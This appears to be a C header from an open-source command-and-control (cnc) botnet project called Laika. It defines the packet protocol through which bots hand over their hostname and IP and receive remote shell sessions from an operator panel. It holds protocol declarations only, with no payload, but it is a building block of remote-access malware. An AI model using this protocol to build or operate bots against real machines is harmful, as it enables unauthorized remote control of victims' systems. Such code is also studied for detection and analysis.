mirror of https://github.com/CPunch/Laika.git
127 lines
4.8 KiB
C
127 lines
4.8 KiB
C
#ifndef LAIKA_PACKET_H
|
|
#define LAIKA_PACKET_H
|
|
|
|
#include <inttypes.h>
|
|
|
|
#define LAIKA_MAGIC "LAI\x12"
|
|
#define LAIKA_MAGICLEN 4
|
|
|
|
#define LAIKA_MAX_PKTSIZE 4096
|
|
|
|
#define LAIKA_HOSTNAME_LEN 64
|
|
#define LAIKA_IPV4_LEN 22
|
|
#define LAIKA_INET_LEN 22
|
|
|
|
#define LAIKA_SHELL_DATA_MAX_LENGTH 2048
|
|
#define LAIKA_MAX_SHELLS 16
|
|
|
|
/* first handshake between peer & cnc works as so:
|
|
- peer connects to cnc and sends a LAIKAPKT_HANDSHAKE_REQ with the peer's pubkey, hostname & inet ip
|
|
- after cnc receives LAIKAPKT_HANDSHAKE_REQ, all packets are encrypted
|
|
- cnc responds with LAIKAPKT_HANDSHAKE_RES
|
|
- if peer is an authenticated client (panel), LAIKAPKT_AUTHENTICATED_HANDSHAKE_REQ is then sent
|
|
*/
|
|
|
|
/* encrypted packets are laid out like so: (any packet sent/received where peer->useSecure is true)
|
|
LAIKAPKT_ID pktID; -- plain text
|
|
uint8_t nonce[crypto_secretbox_NONCEBYTES]; -- plain text
|
|
uint8_t body[pktSize + crypto_secretbox_MACBYTES]; -- encrypted with shared key & nonce
|
|
*/
|
|
|
|
/*
|
|
any packet ending with *_RES is cnc 2 peer
|
|
any packet ending with *_REQ is peer 2 cnc
|
|
if packet doesn't have either, it can be sent & received by both peer & cnc
|
|
*/
|
|
enum {
|
|
/* ==================================================[[ Peer ]]================================================== */
|
|
LAIKAPKT_VARPKT,
|
|
/* layout of LAIKAPKT_VARPKT:
|
|
* LAIKAPKT_SIZE pktSize;
|
|
* LAIKAPKT_ID pktID;
|
|
*/
|
|
LAIKAPKT_HANDSHAKE_REQ, /* first packet sent by peer & received by cnc */
|
|
/* layout of LAIKAPKT_HANDSHAKE_REQ: *NOTE* ALL DATA IN THIS PACKET IS SENT IN PLAINTEXT!!
|
|
* uint8_t laikaMagic[LAIKA_MAGICLEN]; -- LAIKA_MAGIC
|
|
* uint8_t majorVer;
|
|
* uint8_t minorVer;
|
|
* uint8_t osType;
|
|
* uint8_t pubKey[crypto_kx_PUBLICKEYBYTES]; -- freshly generated pubKey to encrypt decrypted nonce with
|
|
* char hostname[LAIKA_HOSTNAME_LEN]; -- can be empty (ie. all NULL bytes)
|
|
* char inet[LAIKA_INET_LEN]; -- can be empty (ie. all NULL bytes)
|
|
*/
|
|
LAIKAPKT_HANDSHAKE_RES,
|
|
/* layout of LAIKAPKT_HANDSHAKE_RES:
|
|
* uint8_t cncEndian;
|
|
*/
|
|
LAIKAPKT_PINGPONG,
|
|
/* layout of LAIKAPKT_PINGPONG:
|
|
* NULL (empty packet)
|
|
*/
|
|
LAIKAPKT_SHELL_OPEN, /* if sent to bot, opens a shell. if sent to cnc, signifies you opened a shell */
|
|
/* layout of LAIKAPKT_SHELL_OPEN:
|
|
* uint32_t id; // this field is absent from the panel/auth client
|
|
* uint16_t cols;
|
|
* uint16_t rows;
|
|
*/
|
|
LAIKAPKT_SHELL_CLOSE, /* if sent to bot, closes a shell. if sent to cnc, signifies a shell was closed */
|
|
/* layout of LAIKAPKT_SHELL_CLOSE:
|
|
* uint32_t id; // this field is absent from the panel/auth client
|
|
*/
|
|
LAIKAPKT_SHELL_DATA, /* if sent to bot, writes data to stdin of shell. if sent to cnc, writes to 'stdout' of shell */
|
|
/* layout of LAIKAPKT_SHELL_DATA
|
|
* uint32_t id; // this field is absent from the panel/auth client
|
|
* char buf[VAR_PACKET_LENGTH-sizeof(uint32_t)];
|
|
*/
|
|
LAIKAPKT_CONTENT_NEW,
|
|
/* layout of LAIKAPKT_CONTENT_NEW:
|
|
* uint16_t id;
|
|
* uint32_t sz;
|
|
* uint8_t type;
|
|
*/
|
|
LAIKAPKT_CONTENT_ERROR,
|
|
/* layout of LAIKAPKT_CONTENT_ERROR:
|
|
* uint16_t id;
|
|
* uint8_t errCode;
|
|
*/
|
|
LAIKAPKT_CONTENT_CHUNK, /* variadic */
|
|
/* layout of LAIKAPKT_CONTENT_CHUNK:
|
|
* uint16_t id;
|
|
* uint8_t buf[VAR_PACKET_LENGTH-sizeof(uint16_t)];
|
|
*/
|
|
/* ==================================================[[ Auth ]]================================================== */
|
|
LAIKAPKT_AUTHENTICATED_HANDSHAKE_REQ, /* second packet sent by authenticated peers (panel). there is no response packet */
|
|
/* layout of LAIKAPKT_STAGE2_HANDSHAKE_REQ
|
|
* uint8_t peerType;
|
|
*/
|
|
LAIKAPKT_AUTHENTICATED_ADD_PEER_RES, /* notification that a peer has connected to the cnc */
|
|
/* layout of LAIKAPKT_AUTHENTICATED_ADD_PEER_RES
|
|
* uint8_t pubKey[crypto_kx_PUBLICKEYBYTES]; -- pubkey of said bot
|
|
* char hostname[LAIKA_HOSTNAME_LEN];
|
|
* char inet[LAIKA_INET_LEN];
|
|
* char ipv4[LAIKA_IPV4_LEN];
|
|
* uint8_t peerType;
|
|
* uint8_t osType;
|
|
*/
|
|
LAIKAPKT_AUTHENTICATED_RMV_PEER_RES, /* notification that a peer has disconnected from the cnc */
|
|
/* layout of LAIKAPKT_AUTHENTICATED_RMV_PEER_RES
|
|
* uint8_t pubKey[crypto_kx_PUBLICKEYBYTES]; -- pubkey of said bot
|
|
* uint8_t peerType;
|
|
*/
|
|
LAIKAPKT_AUTHENTICATED_SHELL_OPEN_REQ, /* panel requesting cnc open a shell on bot. there is no response packet, shell is assumed to be open */
|
|
/* layout of LAIKAPKT_AUTHENTICATE_OPEN_SHELL_REQ
|
|
* uint8_t pubKey[crypto_kx_PUBLICKEYBYTES]; -- pubkey of said bot
|
|
* uint16_t cols;
|
|
* uint16_t rows;
|
|
*/
|
|
LAIKAPKT_MAXNONE
|
|
};
|
|
|
|
typedef uint8_t LAIKAPKT_ID;
|
|
typedef uint16_t LAIKAPKT_SIZE;
|
|
|
|
#ifdef DEBUG
|
|
const char* laikaD_getPacketName(LAIKAPKT_ID);
|
|
#endif
|
|
|
|
#endif |